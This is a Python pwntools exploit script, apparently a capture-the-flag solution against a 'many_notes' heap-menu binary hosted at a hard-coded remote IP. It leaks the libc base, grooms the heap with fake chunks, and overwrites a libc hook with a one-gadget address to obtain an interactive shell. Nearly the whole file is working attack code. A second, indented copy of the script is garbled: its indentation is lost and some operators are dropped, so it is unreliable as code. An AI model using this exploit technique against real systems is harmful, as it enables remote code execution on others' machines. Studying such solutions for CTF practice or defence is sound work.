hama7230/exp.py

## exp.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('./libc.so.6')
elf = ELF('./many_notes')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log

RHOST = "123.206.174.203"
RPORT = 20003
LHOST = "127.0.0.1"
LPORT = 20003

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./many_notes'], gdbscript=gdbscript)
else:
    #conn = process(['./many_notes'])
    conn = process(['./many_notes'], env={'LD_LIBRARY_PATH': './'})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')

def add(size, pad, ip, p):
    conn.sendlineafter('Choice:', '0')
    conn.sendlineafter('Size', str(size))
    conn.sendlineafter('Padding', str(pad))
    if ip:
        conn.sendlineafter('Input? (0/1):', '1')
        conn.sendafter('Content', p)
    else:
        conn.sendlineafter('Input? (0/1):', '0')


conn.send('x'*0x8)
conn.recvuntil('x'*0x8)
libc_base = u64(conn.recv(6) + '\x00'*2) - 0x3ab720
dbg('libc_base')

print hex(libc_base & 0xfffffffff8000000)
add(0x2000, 0x0, False, '')
for i in range(0x16):
    print i
    add(0x2000, 0x400, False, '')
add(0x2000, 0x3ff, False, '')
add(0x2000, 0x3b6, False, '')
add(0x1f00, 0, False, '')
add(0x100, 0x4, False, '')

payload = p64(0) + p64(0x75)
payload += p64(0xbfffe50 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffe70 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffe90 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffea0 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(libc_base+0x3dabed) + p64(0)
add(0x140, 0, True, payload.ljust(0x130, 'w'))

payload = 'w'*0xa0
payload += p64((libc_base & 0xfffffffff8000000)+0x20) + p64(0)
payload += p64(0x0000000003fff000) * 2
payload += p64(0x0000000300000000) + p64(0)
payload += '\x00'*0x20 + p64( 0xbfffe30 - 0x10000000 + (libc_base & 0xfffffffff8000000))
time.sleep(0.001)
print hex(len(payload))
conn.send(payload)

payload = '\x00'*3 + p64(0xdead) * 2
payload = payload.ljust(0x40, 'a') +  p64(libc_base + 0x3aac10) + p64(0) *3
add(0x60, 0, True, payload)
add(0x68, 2, False, '')
add(0x68, 0, True, p64(libc_base + 0xdea81).ljust(0x68,'\x00'))

conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('./libc.so.6')
	elf = ELF('./many_notes')
	context(os='linux', arch=elf.arch)
	# context(log_level='debug') # output verbose log

	RHOST = "123.206.174.203"
	RPORT = 20003
	LHOST = "127.0.0.1"
	LPORT = 20003

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./many_notes'], gdbscript=gdbscript)
	else:
	#conn = process(['./many_notes'])
	conn = process(['./many_notes'], env={'LD_LIBRARY_PATH': './'})
	if opt == 'a': gdb.attach(conn)

	# exploit
	log.info('Pwning')

	def add(size, pad, ip, p):
	conn.sendlineafter('Choice:', '0')
	conn.sendlineafter('Size', str(size))
	conn.sendlineafter('Padding', str(pad))
	if ip:
	conn.sendlineafter('Input? (0/1):', '1')
	conn.sendafter('Content', p)
	else:
	conn.sendlineafter('Input? (0/1):', '0')



	conn.send('x'*0x8)
	conn.recvuntil('x'*0x8)
	libc_base = u64(conn.recv(6) + '\x00'*2) - 0x3ab720
	dbg('libc_base')

	print hex(libc_base & 0xfffffffff8000000)
	add(0x2000, 0x0, False, '')
	for i in range(0x16):
	print i
	add(0x2000, 0x400, False, '')
	add(0x2000, 0x3ff, False, '')
	add(0x2000, 0x3b6, False, '')
	add(0x1f00, 0, False, '')
	add(0x100, 0x4, False, '')

	payload = p64(0) + p64(0x75)
	payload += p64(0xbfffe50 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
	payload += p64(0) + p64(0x75)
	payload += p64(0xbfffe70 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
	payload += p64(0) + p64(0x75)
	payload += p64(0xbfffe90 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
	payload += p64(0) + p64(0x75)
	payload += p64(0xbfffea0 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
	payload += p64(0) + p64(0x75)
	payload += p64(libc_base+0x3dabed) + p64(0)
	add(0x140, 0, True, payload.ljust(0x130, 'w'))

	payload = 'w'*0xa0
	payload += p64((libc_base & 0xfffffffff8000000)+0x20) + p64(0)
	payload += p64(0x0000000003fff000) * 2
	payload += p64(0x0000000300000000) + p64(0)
	payload += '\x00'*0x20 + p64( 0xbfffe30 - 0x10000000 + (libc_base & 0xfffffffff8000000))
	time.sleep(0.001)
	print hex(len(payload))
	conn.send(payload)

	payload = '\x00'3 + p64(0xdead) 2
	payload = payload.ljust(0x40, 'a') + p64(libc_base + 0x3aac10) + p64(0) *3
	add(0x60, 0, True, payload)
	add(0x68, 2, False, '')
	add(0x68, 0, True, p64(libc_base + 0xdea81).ljust(0x68,'\x00'))

	conn.interactive()